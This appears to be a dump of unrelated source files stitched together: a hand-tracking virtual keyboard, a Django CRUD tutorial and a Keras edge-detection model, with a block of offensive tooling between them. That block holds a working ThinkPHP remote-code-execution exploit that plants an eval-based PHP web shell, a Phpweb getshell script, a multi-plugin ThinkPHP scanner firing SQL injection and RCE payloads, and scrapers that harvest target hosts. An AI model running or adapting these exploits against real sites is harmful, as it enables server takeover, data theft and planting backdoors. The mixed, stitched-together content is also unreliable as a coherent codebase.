keys = [["Q", "W", "E", "R", "T", "Y", "U", "I", "O", "P"],
["A", "S", "D", "F", "G", "H", "J", "K", "L", "space"],
["Z", "X", "C", "V", "B", "N", "M", ",", ".", "Del"]]
finalText = ""
keyboard = Controller()
def drawAll(img, buttonList):
for button in buttonList:
x, y = button.pos
w, h = button.size
cvzone.cornerRect(img, (button.pos[0], button.pos[1], button.size[0], button.size[1]),
20, rt=0)
cv2.rectangle(img, button.pos, (x + w, y + h), (255, 0, 255), cv2.FILLED)
cv2.putText(img, button.text, (x + 20, y + 65),
cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 4)
return img
#
# def drawAll(img, buttonList):
# imgNew = np.zeros_like(img, np.uint8)
# for button in buttonList:
# x, y = button.pos
# cvzone.cornerRect(imgNew, (button.pos[0], button.pos[1], button.size[0], button.size[1]),
# 20, rt=0)
# cv2.rectangle(imgNew, button.pos, (x + button.size[0], y + button.size[1]),
# (255, 0, 255), cv2.FILLED)
# cv2.putText(imgNew, button.text, (x + 40, y + 60),
# cv2.FONT_HERSHEY_PLAIN, 2, (255, 255, 255), 3)
#
# out = img.copy()
# alpha = 0.5
# mask = imgNew.astype(bool)
# print(mask.shape)
# out[mask] = cv2.addWeighted(img, alpha, imgNew, 1 - alpha, 0)[mask]
# return out
class Button():
def __init__(self, pos, text, size=[85, 85]):
self.pos = pos
self.size = size
self.text = text
buttonList = []
for i in range(len(keys)):
for j, key in enumerate(keys[i]):
buttonList.append(Button([100 * j + 50, 100 * i + 50], key))
while True:
success, img = cap.read()
img = detector.findHands(img)
lmList, bboxInfo = detector.findPosition(img)
img = drawAll(img, buttonList)
if lmList:
for button in buttonList:
x, y = button.pos
w, h = button.size
if x < lmList[8][0] < x + w and y < lmList[8][1] < y + h:
cv2.rectangle(img, (x - 5, y - 5), (x + w + 5, y + h + 5), (175, 0, 175), cv2.FILLED)
cv2.putText(img, button.text, (x + 20, y + 65),
cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 4)
l, _, _ = detector.findDistance(8, 12, img, draw=False)
print(l)
## when clicked
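                # landmarks 8 and 12 are the index and middle fingertips; a
                # pinch closer than 35 px is treated as a key press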
if l < 35:
if button.text=="Del":
keyboard.press(Key.backspace)
cv2.rectangle(img, button.pos, (x + w, y + h), (0, 255, 0), cv2.FILLED)
cv2.putText(img, button.text, (x + 20, y + 65),
cv2.FONT_HERSHEY_PLAIN, 3, (255, 255, 255), 4)
finalText = finalText[:-1]
elif button.text=='space':
keyboard.press(Key.space)
cv2.rectangle(img, button.pos, (x + w, y + h), (0, 255, 0), cv2.FILLED)
cv2.putText(img, button.text, (x + 20, y + 65),
cv2.FONT_HERSHEY_PLAIN, 3, (255, 255, 255), 4)
finalText +=" "
else:
keyboard.press(button.text)
cv2.rectangle(img, button.pos, (x + w, y + h), (0, 255, 0), cv2.FILLED)
cv2.putText(img, button.text, (x + 20, y + 65),
cv2.FONT_HERSHEY_PLAIN, 4, (255, 255, 255), 4)
finalText += button.text
sleep(0.5)
cv2.rectangle(img, (50, 350), (700, 450), (175, 0, 175), cv2.FILLED)
cv2.putText(img, finalText, (60, 430),
cv2.FONT_HERSHEY_PLAIN, 5, (255, 255, 255), 5)
cv2.imshow("Image", img)
cv2.waitKey(1)
|
nitinprakash96/zeolearn-tut
|
crudapp/crudapp/views.py
|
<reponame>nitinprakash96/zeolearn-tut
from django.shortcuts import render, redirect, get_object_or_404
from django.http import HttpResponse
def home(request):
html = """
<h1>Django CRUD Example</h1>
<a href="/blog_posts/">Blog post CRUD example</a><br>
"""
return HttpResponse(html)
|
nitinprakash96/zeolearn-tut
|
crudapp/blog_posts/views.py
|
<gh_stars>0
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render, redirect, get_object_or_404
from django.forms import ModelForm
from blog_posts.models import blog_posts
# Create your views here.
class PostsForm(ModelForm):
class Meta:
model = blog_posts
fields = ['id', 'title', 'author']
def post_list(request, template_name='blog_posts/post_list.html'):
posts = blog_posts.objects.all()
data = {}
data['object_list'] = posts
return render(request, template_name, data)
def post_create(request, template_name='blog_posts/post_form.html'):
form = PostsForm(request.POST or None)
if form.is_valid():
form.save()
return redirect('blog_posts:post_list')
return render(request, template_name, {'form': form})
def post_update(request, pk, template_name='blog_posts/post_form.html'):
post = get_object_or_404(blog_posts, pk=pk)
form = PostsForm(request.POST or None, instance=post)
if form.is_valid():
form.save()
return redirect('blog_posts:post_list')
return render(request, template_name, {'form': form})
def post_delete(request, pk, template_name='blog_posts/post_delete.html'):
post = get_object_or_404(blog_posts, pk=pk)
if request.method=='POST':
post.delete()
return redirect('blog_posts:post_list')
return render(request, template_name, {'object': post})
|
nitinprakash96/zeolearn-tut
|
crudapp/blog_posts/urls.py
|
from django.conf.urls import url
from blog_posts import views
urlpatterns = [
url(r'^$', views.post_list, name='post_list'),
url(r'^new$', views.post_create, name='post_new'),
url(r'^edit/(?P<pk>\d+)$', views.post_update, name='post_edit'),
url(r'^delete/(?P<pk>\d+)$', views.post_delete, name='post_delete'),
]
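# Example routing (illustrative): GET /blog_posts/edit/3 resolves to
# views.post_update(request, pk='3').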
|
nitinprakash96/zeolearn-tut
|
crudapp/crudapp/urls.py
|
<reponame>nitinprakash96/zeolearn-tut
"""crudapp URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
"""
from django.conf.urls import url, include
from django.contrib import admin
from crudapp.views import home
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'^blog_posts/', include('blog_posts.urls', namespace='blog_posts')),
url(r'^$', home, name='home' ),
]
|
jun-test/super-guacamole
|
thinkphp5.0.1-automatic-getshell-master/tp_exp.py
|
<reponame>jun-test/super-guacamole<filename>thinkphp5.0.1-automatic-getshell-master/tp_exp.py
# -*- encoding: utf8 -*-
'''
Thinkphp 5.0.10 Exploit
by DKing
'''
import requests
import base64
import re
#_url = 'https://qaq.link/'
#_proxies = {}
#_headers = {}
#_auth = ('<PASSWORD>', '<PASSWORD>')
_url = 'http://wwww.xxxxxx.com'
_proxies = {'http': 'http://127.0.0.1:2081/', 'https': 'http://127.0.0.1:2081/'} # set your proxy here
_headers = {'Cookie': 'PHPSESSID=fbg7079bj6968cts9ulc597703',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.132 Safari/537.36'}
_auth = None
def send_payload(data):
try:
r=requests.post(_url, data=data, proxies=_proxies, headers=_headers, timeout=5, auth=_auth)
except:
        print('Timed out, please retry')
return False
if 'Cannot call assert() with string argument dynamically' in r.text:
        print('PHP version too high')
return False
before_exception = r.text.split('<div class="exception">')
if len(before_exception) == 1:
return False
after_echo = before_exception[0].split('<div class="echo">')
if len(after_echo) == 1:
return False
result = after_echo[1].split('</div>')[0][11:-4]
if not result:
        print('Response body is empty')
return True
return result
def run_php_script(script):
payload = {
's': script,
'_method': '__construct',
'filter': 'assert'
}
return send_payload(payload)
def list_dir(path):
script = 'var_dump(scandir("' + path.replace('"', '\\"') + '"))'
var_dumps = run_php_script(script)
if var_dumps and var_dumps is not True:
return re.findall(r'\s+string\(\d+\)\s\"(.+)\"', var_dumps)
def write_file(filename, content):
encoded_content = str(base64.b64encode(content.encode('utf-8')),'utf-8')
script = 'file_put_contents("%s", base64_decode("%s"))' % (filename.replace('"', '\\"'), encoded_content)
return run_php_script(script)
def dump_file(path, method=1):
if method == 1:
script = 'include("%s")' % (path.replace('"', '\\"'))
return run_php_script(script)
else:
payload2 = {
'_method': '__construct',
'method': 'get',
'filter[]': 'think\\__include_file',
'get[]': path,
'server[]': 'phpinfo',
}
return send_payload(payload2)
def delete_file(filename):
script = 'unlink("%s")' % filename
return run_php_script(script)
def write_shell(module_name='index', shell_name='Indexa', key='cmd'):
    # create the controller file
filename = '../application/%s/controller/%s.php' % (module_name, shell_name)
content = '''<?php
namespace app\%s\controller;
class %s
{
public function index()
{
eval($_POST['%s']);
}
}
''' % (module_name, shell_name, key)
write_file(filename, content)
folder = '../application/%s/controller/' % (module_name)
current_files = list_dir(folder)
if current_files and (shell_name + '.php' in current_files):
print('Write OK')
print(dump_file(filename))
else:
print('Failed to write shell')
if __name__ == '__main__':
list_dir('.')
list_dir('../application')
dump_file('../application/.htaccess')
|
jun-test/super-guacamole
|
TPscan/plugins/thinkphp_checkcode_time_sqli.py
|
<filename>TPscan/plugins/thinkphp_checkcode_time_sqli.py
#!/usr/bin/env python
# coding=utf-8
import time
import urllib
import requests
def thinkphp_checkcode_time_sqli_verify(url):
pocdict = {
"vulnname":"thinkphp_checkcode_time_sqli",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
}
headers = {
"User-Agent" : "TPscan",
"DNT": "1",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"Content-Type": "multipart/form-data; boundary=--------641902708",
"Accept-Encoding": "gzip, deflate, sdch",
"Accept-Language": "zh-CN,zh;q=0.8",
}
payload = "----------641902708\r\nContent-Disposition: form-data; name=\"couponid\"\r\n\r\n1')UniOn SelEct slEEp(8)#\r\n\r\n----------641902708--"
try:
start_time = time.time()
vurl = urllib.parse.urljoin(url, 'index.php?s=/home/user/checkcode/')
req = requests.post(vurl, data=payload, headers=headers, timeout=15, verify=False)
if time.time() - start_time >= 8:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['payload'] = payload
pocdict['proof'] = 'time sleep 8'
pocdict['response'] = req.text
print(pocdict)
except:
pass
|
jun-test/super-guacamole
|
Phpweb-Getshell-py/Main.py
|
<filename>Phpweb-Getshell-py/Main.py
# -*- coding: UTF-8 -*- #
import os
import requests
import hashlib
bdlj = os.getcwd()
headers = open(os.path.join(bdlj, "headers.txt"), 'r')
headerss = headers.read()
print('\b')
ur = input("Enter the target URL: ")
requrl = ur + '/base/post.php'
reqdata = {"act":"appcode"}
r = requests.post(requrl,data=reqdata)
cz=r.text[2:34]
print('Initial value: ' + cz)
cz=r.text[2:34]+"a"
m = hashlib.md5()
b = cz.encode(encoding='utf-8')
m.update(b)
zz = m.hexdigest()
print('Final value: ' + zz)
infile = open(os.path.join(bdlj, "datas.txt"), "r", encoding='utf-8')
outfile = open(os.path.join(bdlj, "datah.txt"), "w", encoding='utf-8')
for line in infile:
outfile.write(line.replace('156as1f56safasfasfa', zz))
infile.close()
outfile.close()
datas = open(os.path.join(bdlj, "datah.txt"), 'r')
datass = datas.read()
gs = requests.post(ur + '/base/appfile.php',data=datass,headers={'Content-Type':headerss})
gs.encoding = 'utf-8'
print (gs.text)
if gs.text == "OK":  # the original `if {...}:` built a one-element set, which is always truthy
    print("Getshell succeeded! Shell: " + ur + "/effect/source/bg/mstir.php")
else:
    print("Getshell failed!")
|
jun-test/super-guacamole
|
TPscan/plugins/thinkphp_debug_index_ids_sqli.py
|
<reponame>jun-test/super-guacamole<filename>TPscan/plugins/thinkphp_debug_index_ids_sqli.py<gh_stars>1-10
#!/usr/bin/env python
# coding=utf-8
import urllib
import requests
def thinkphp_debug_index_ids_sqli_verify(url):
pocdict = {
"vulnname":"thinkphp_debug_index_ids_sqli",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
}
headers = {
"User-Agent" : "TPscan",
}
payload = 'index.php?ids[0,UpdAtexml(0,ConcAt(0xa,Md5(2333)),0)]=1'
try:
vurl = urllib.parse.urljoin(url, payload)
req = requests.get(vurl, headers=headers, timeout=15, verify=False)
if r"56540676a129760" in req.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['proof'] = '56540676a129760'
pocdict['response'] = req.text
print(pocdict)
except:
pass
|
jun-test/super-guacamole
|
TPscan/plugins/thinkphp_index_showid_rce.py
|
<filename>TPscan/plugins/thinkphp_index_showid_rce.py
#!/usr/bin/env python
# coding=utf-8
import urllib
import datetime
import requests
def thinkphp_index_showid_rce_verify(url):
pocdict = {
"vulnname":"thinkphp_index_showid_rce",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
}
headers = {
"User-Agent" : 'TPscan',
}
try:
vurl = urllib.parse.urljoin(url, 'index.php?s=my-show-id-\\x5C..\\x5CTpl\\x5C8edy\\x5CHome\\x5Cmy_1{~print_r(md5(2333))}]')
req = requests.get(vurl, headers=headers, timeout=15, verify=False)
timenow = datetime.datetime.now().strftime("%Y_%m_%d")[2:]
vurl2 = urllib.parse.urljoin(url, 'index.php?s=my-show-id-\\x5C..\\x5CRuntime\\x5CLogs\\x5C{0}.log'.format(timenow))
req2 = requests.get(vurl2, headers=headers, timeout=15, verify=False)
if r"56540676a129760a3" in req2.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['proof'] = '56540676a129760a3 found'
pocdict['response'] = req2.text
print(pocdict)
except:
pass
|
jun-test/super-guacamole
|
TPscan/plugins/thinkphp_index_construct_rce.py
|
#!/usr/bin/env python
# coding=utf-8
import urllib
import requests
def thinkphp_index_construct_rce_verify(url):
pocdict = {
"vulnname":"thinkphp_index_construct_rce",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
}
headers = {
"User-Agent": 'TPscan',
"Content-Type": "application/x-www-form-urlencoded",
}
payload = 's=4e5e5d7364f443e28fbf0d3ae744a59a&_method=__construct&method&filter[]=print_r'
try:
vurl = urllib.parse.urljoin(url, 'index.php?s=index/index/index')
req = requests.post(vurl, data=payload, headers=headers, timeout=15, verify=False)
if r"4e5e5d7364f443e28fbf0d3ae744a59a" in req.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['payload'] = payload
pocdict['proof'] = '4e5e5d7364f443e28fbf0d3ae744a59a'
pocdict['response'] = req.text
print(pocdict)
except:
pass
|
jun-test/super-guacamole
|
TPscan/TPscan.py
|
#!/usr/bin/env python
# coding=utf-8
from gevent import monkey;monkey.patch_all()
from gevent.pool import Pool
from plugins.thinkphp_checkcode_time_sqli import thinkphp_checkcode_time_sqli_verify
from plugins.thinkphp_construct_code_exec import thinkphp_construct_code_exec_verify
from plugins.thinkphp_construct_debug_rce import thinkphp_construct_debug_rce_verify
from plugins.thinkphp_debug_index_ids_sqli import thinkphp_debug_index_ids_sqli_verify
from plugins.thinkphp_driver_display_rce import thinkphp_driver_display_rce_verify
from plugins.thinkphp_index_construct_rce import thinkphp_index_construct_rce_verify
from plugins.thinkphp_index_showid_rce import thinkphp_index_showid_rce_verify
from plugins.thinkphp_invoke_func_code_exec import thinkphp_invoke_func_code_exec_verify
from plugins.thinkphp_lite_code_exec import thinkphp_lite_code_exec_verify
from plugins.thinkphp_method_filter_code_exec import thinkphp_method_filter_code_exec_verify
from plugins.thinkphp_multi_sql_leak import thinkphp_multi_sql_leak_verify
from plugins.thinkphp_pay_orderid_sqli import thinkphp_pay_orderid_sqli_verify
from plugins.thinkphp_request_input_rce import thinkphp_request_input_rce_verify
from plugins.thinkphp_view_recent_xff_sqli import thinkphp_view_recent_xff_sqli_verify
import sys
import gevent
print('''
___________
|_ _| ___ \
| | | |_/ /__ ___ __ _ _ __
| | | __/ __|/ __/ _` | '_ \
| | | | \__ \ (_| (_| | | | |
\_/ \_| |___/\___\__,_|_| |_|
code by Lucifer
''')
targeturl = input("[*]Give me a target: ")
if targeturl.find('http') == -1:
exit(1)
poclist = [
'thinkphp_checkcode_time_sqli_verify("{0}")'.format(targeturl),
'thinkphp_construct_code_exec_verify("{0}")'.format(targeturl),
'thinkphp_construct_debug_rce_verify("{0}")'.format(targeturl),
'thinkphp_debug_index_ids_sqli_verify("{0}")'.format(targeturl),
'thinkphp_driver_display_rce_verify("{0}")'.format(targeturl),
'thinkphp_index_construct_rce_verify("{0}")'.format(targeturl),
'thinkphp_index_showid_rce_verify("{0}")'.format(targeturl),
'thinkphp_invoke_func_code_exec_verify("{0}")'.format(targeturl),
'thinkphp_lite_code_exec_verify("{0}")'.format(targeturl),
'thinkphp_method_filter_code_exec_verify("{0}")'.format(targeturl),
'thinkphp_multi_sql_leak_verify("{0}")'.format(targeturl),
'thinkphp_pay_orderid_sqli_verify("{0}")'.format(targeturl),
'thinkphp_request_input_rce_verify("{0}")'.format(targeturl),
'thinkphp_view_recent_xff_sqli_verify("{0}")'.format(targeturl),
]
def pocexec(pocstr):
exec(pocstr)
gevent.sleep(0)
pool = Pool(10)
threads = [pool.spawn(pocexec, item) for item in poclist]
gevent.joinall(threads)
|
jun-test/super-guacamole
|
zoomeye.py
|
<gh_stars>1-10
import requests
import json
import sys
def login():
url_login='https://api.zoomeye.org/user/login'
data={
"username": "你的账号",
"password": "<PASSWORD>"
}
    data = json.dumps(data)  # serialize the payload above as JSON
    r=requests.post(url=url_login,data=data)  # request an access_token
    return(json.loads(r.content)['access_token'])  # extract the access_token value
def main(keyword):
url='https://api.zoomeye.org/host/search?query=%s'%(keyword)
headers={'Authorization':'JWT '+login()}
r=requests.get(url=url,headers=headers)
    datas=json.loads(r.content)['matches']  # parse the JSON response into Python objects
# print(datas)
for data in datas:
print(data['portinfo']['service']+'://'+data['ip']+':'+str(data['portinfo']['port']))
with open('ip.txt','a+',encoding='utf8') as f:
f.write(data['portinfo']['service']+'://'+data['ip']+':'+str(data['portinfo']['port'])+'\n')
if __name__ =='__main__':
    print('''*Author : tdcoming.
''')
if len(sys.argv)!=2:
        print('usage: python %s keyword' % sys.argv[0])
sys.exit(-1)
else:
main(sys.argv[1])
|
jun-test/super-guacamole
|
TPscan/plugins/thinkphp_request_input_rce.py
|
#!/usr/bin/env python
# coding=utf-8
import urllib
import requests
def thinkphp_request_input_rce_verify(url):
pocdict = {
"vulnname":"thinkphp_request_input_rce",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
}
headers = {
"User-Agent" : 'TPscan',
}
try:
vurl = urllib.parse.urljoin(url, 'index.php?s=index/\\think\Request/input&filter=var_dump&data=f7e0b956540676a129760a3eae309294')
req = requests.get(vurl, headers=headers, timeout=15, verify=False)
if r"56540676a129760a" in req.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['proof'] = '56540676a129760a'
pocdict['response'] = req.text
print(pocdict)
except:
pass
|
jun-test/super-guacamole
|
TPscan/plugins/thinkphp_view_recent_xff_sqli.py
|
#!/usr/bin/env python
# coding=utf-8
import urllib
import requests
def thinkphp_view_recent_xff_sqli_verify(url):
pocdict = {
"vulnname":"thinkphp_view_recent_xff_sqli",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
}
headers = {
"User-Agent" : 'TPscan',
"X-Forwarded-For" : "1')And/**/ExtractValue(1,ConCat(0x5c,(sElEct/**/Md5(2333))))#"
}
try:
vurl = urllib.parse.urljoin(url, 'index.php?s=/home/article/view_recent/name/1')
req = requests.get(vurl, headers=headers, timeout=15, verify=False)
if r"56540676a129760a" in req.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['proof'] = '56540676a129760a'
pocdict['response'] = req.text
print(pocdict)
except:
pass
|
jun-test/super-guacamole
|
BaiDuSpider.py
|
<filename>BaiDuSpider.py
#-*_coding:utf8-*-
from bs4 import BeautifulSoup
import requests
import re
import sys
import queue
import threading
hea={'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
'Accept-Language' : 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3',
'Connection' : 'keep-alive',
'Accept' : 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'X-Forwarded-For':'192.168.127.12'}
class BaiduSpider(threading.Thread):
"""docstring for BaiduSpider"""
def __init__(self, q):
threading.Thread.__init__(self)
self.q = q
def run(self):
while not self.q.empty():
url=self.q.get()
try:
self.spider(url)
except Exception as e:
print(e)
pass
def spider(self,url):
r = requests.get(url=url,headers=hea).content
soup = BeautifulSoup(r,'lxml')
urls=soup.find_all(name='a',attrs={'data-click':re.compile('.'),'class':None})
for url in urls:
r_get_url = requests.get(url=url['href'],headers=hea,timeout=8)
if r_get_url.status_code==200:
print(r_get_url.url)
                with open('url.txt','a+') as f:
                    f.write(r_get_url.url+'\n')
def main(keyword):
q=queue.Queue()
for i in range(0,760,10):# #wd是控制的参数,每一页pn加10,最大页码为750
q.put('https://www.baidu.com/s?wd=%s&pn=%s'%(keyword,str(i)))
threads = []
threads_count=20
for t in range(threads_count):
threads.append(BaiduSpider(q))
for t in threads:
t.start()
for t in threads:
t.join()
if __name__ == '__main__':
print('''
*Made by :tdcoming
*QQ Group :256998718
*For More :https://t.zsxq.com/Ai2rj6E
*MY Heart :https://t.zsxq.com/A2FQFMN
_______ _ _
|__ __| | | (_)
| | __| | ___ ___ _ __ ___ _ _ __ __ _
| | / _` | / __|/ _ \ | '_ ` _ \ | || '_ \ / _` |
| || (_| || (__| (_) || | | | | || || | | || (_| |
|_| \__,_| \___|\___/ |_| |_| |_||_||_| |_| \__, |
__/ |
|___/
''')
if len(sys.argv) !=2:
print('>>>>>>>>>>>Enter:%s keword<<<<<<<<<<<<<<'%sys.argv[0])
sys.exit(-1)
else:
main(sys.argv[1])
|
jun-test/super-guacamole
|
TPscan/plugins/thinkphp_invoke_func_code_exec.py
|
#!/usr/bin/env python
# coding=utf-8
import re
import urllib
import requests
def thinkphp_invoke_func_code_exec_verify(url):
pocdict = {
"vulnname":"thinkphp_invoke_func_code_exec",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
}
headers = {
"User-Agent" : 'TPscan',
}
controllers = list()
req = requests.get(url, headers=headers, timeout=15, verify=False)
    pattern = '<a\\s+href="/[A-Za-z]+'  # the original [\s+] was a one-char class, not "one or more whitespace"
matches = re.findall(pattern, req.text)
for match in matches:
controllers.append(match.split('/')[1])
controllers.append('index')
controllers = list(set(controllers))
for controller in controllers:
try:
payload = 'index.php?s={0}/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=2333'.format(controller)
vurl = urllib.parse.urljoin(url, payload)
req = requests.get(vurl, headers=headers, timeout=15, verify=False)
if r"56540676a129760a3" in req.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['proof'] = '56540676a129760a3'
pocdict['response'] = req.text
print(pocdict)
except:
pass
|
jun-test/super-guacamole
|
TPscan/plugins/thinkphp_construct_debug_rce.py
|
<reponame>jun-test/super-guacamole<gh_stars>1-10
#!/usr/bin/env python
# coding=utf-8
import urllib
import requests
def thinkphp_construct_debug_rce_verify(url):
pocdict = {
"vulnname":"thinkphp_construct_debug_rce",
"isvul": False,
"vulnurl":"",
"payload":"",
"proof":"",
"response":"",
"exception":"",
}
headers = {
"User-Agent" : "TPscan",
}
payload = {
'_method':'__construct',
'filter[]':'print_r',
'server[REQUEST_METHOD]':'56540676a129760a3',
}
try:
vurl = urllib.parse.urljoin(url, 'index.php')
        req = requests.post(vurl, data=payload, headers=headers, timeout=15, verify=False)
if r"56540676a129760a3" in req.text:
pocdict['isvul'] = True
pocdict['vulnurl'] = vurl
pocdict['payload'] = payload
pocdict['proof'] = '56540676a129760a3'
pocdict['response'] = req.text
print(pocdict)
except:
pass
|
sarojit2018/Deep-Edges
|
model.py
|
<filename>model.py<gh_stars>0
import numpy as np
import os
import skimage.io as io
import skimage.transform as trans
from keras.models import *
from keras.layers import *
from keras.optimizers import *
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras import backend as K
from losses import *
# Handmade PSPNet-style network: pyramid pooling over shallow conv features
def deepEdge(input_size = (512,512,3), training = True):
#conv nets for unsupervised feature extraction
inputs = Input(input_size)
conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(inputs)
conv1 = Conv2D(64, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(conv1)
#Pooling Module
#We will use pooling sizes = 2,4,8,16,32
#Bin1 pooling size = 2
bin1 = MaxPooling2D(pool_size=(2, 2))(conv1)
flat_bin1 = Conv2D(1, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(bin1)
#Bin2 pooling size = 4
bin2 = MaxPooling2D(pool_size=(4, 4))(conv1)
flat_bin2 = Conv2D(1, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(bin2)
#Bin3 pooling size = 8
bin3 = MaxPooling2D(pool_size=(8, 8))(conv1)
flat_bin3 = Conv2D(1, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(bin3)
#Bin4 pooling size = 16
bin4 = MaxPooling2D(pool_size=(16, 16))(conv1)
flat_bin4 = Conv2D(1, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(bin4)
#Bin5 pooling size = 32
bin5 = MaxPooling2D(pool_size=(32, 32))(conv1)
flat_bin5 = Conv2D(1, 3, activation = 'relu', padding = 'same', kernel_initializer = 'he_normal')(bin5)
#Upsample each flattened bins to match the size equal to the original input size
up_bin1 = UpSampling2D(size = (2,2))(flat_bin1)
up_bin2 = UpSampling2D(size = (4,4))(flat_bin2)
up_bin3 = UpSampling2D(size = (8,8))(flat_bin3)
up_bin4 = UpSampling2D(size = (16,16))(flat_bin4)
up_bin5 = UpSampling2D(size = (32,32))(flat_bin5)
#Merge upsampled layers together one after the other along with the unsupervised feature extraction layer
merged_layers = concatenate([conv1,up_bin1], axis = 3)
merged_layers = concatenate([merged_layers,up_bin2], axis = 3)
merged_layers = concatenate([merged_layers,up_bin3], axis = 3)
merged_layers = concatenate([merged_layers,up_bin4], axis = 3)
merged_layers = concatenate([merged_layers,up_bin5], axis = 3)
#Finally generate the binary mask
binary_masks = Conv2D(1, 1, activation = 'sigmoid')(merged_layers)
model = Model(inputs = inputs, outputs = binary_masks)
model.compile(optimizer = Adam(lr = 1e-7), loss = dice_coef_loss, metrics = ['accuracy'])
return model
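# Hedged sketch: losses.py is not included in this repo dump; dice_coef_loss is
# presumably a standard Keras dice loss along these lines (kept commented out
# so it does not shadow the real import above):
# def dice_coef_loss(y_true, y_pred, smooth=1.0):
#     y_true_f = K.flatten(y_true)
#     y_pred_f = K.flatten(y_pred)
#     intersection = K.sum(y_true_f * y_pred_f)
#     dice = (2.0 * intersection + smooth) / (K.sum(y_true_f) + K.sum(y_pred_f) + smooth)
#     return 1.0 - dice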
|
sarojit2018/Deep-Edges
|
trainer.py
|
<reponame>sarojit2018/Deep-Edges<filename>trainer.py<gh_stars>0
from dataloader import *
from model import deepEdge
import tensorflow as tf
from keras.models import *
from keras.layers import *
from keras.optimizers import *
from keras.callbacks import ModelCheckpoint, LearningRateScheduler
from keras import backend as keras
import os
#Instantiate the model
model = deepEdge()
version = 1 #Version number
model_name = 'deepEdge_best_val_loss_v1.hdf5'
start_from_scratch = False
if not start_from_scratch:
if os.path.exists(model_name):
print("Model Exists! Resuming fine tuning")
try:
            model.load_weights('./' + model_name)
except:
print("Error Loading model: Can happen in the event of a change in model arch/file getting corrupt!")
print("Starting from scratch")
else:
print("Given version model does not exists, starting from scratch")
num_training_samples = 240
batch_size = 10
steps_per_epoch = 40
num_epochs = 1000
checkpoint_filepath = './'
model_checkpoint_callback = tf.keras.callbacks.ModelCheckpoint(
filepath=checkpoint_filepath,
save_weights_only=True,
monitor='val_loss',
mode='min',
save_best_only=True)
model_checkpoint = ModelCheckpoint(model_name, monitor='val_loss', verbose=1, save_best_only=True)
model.fit(datastreamer_BIPED(), steps_per_epoch=steps_per_epoch,epochs=num_epochs,validation_data = datastreamer_BIPED(mode = 'test'),validation_steps = 1, callbacks = [model_checkpoint])
model.save('deepEdge_end_of_training.h5')
|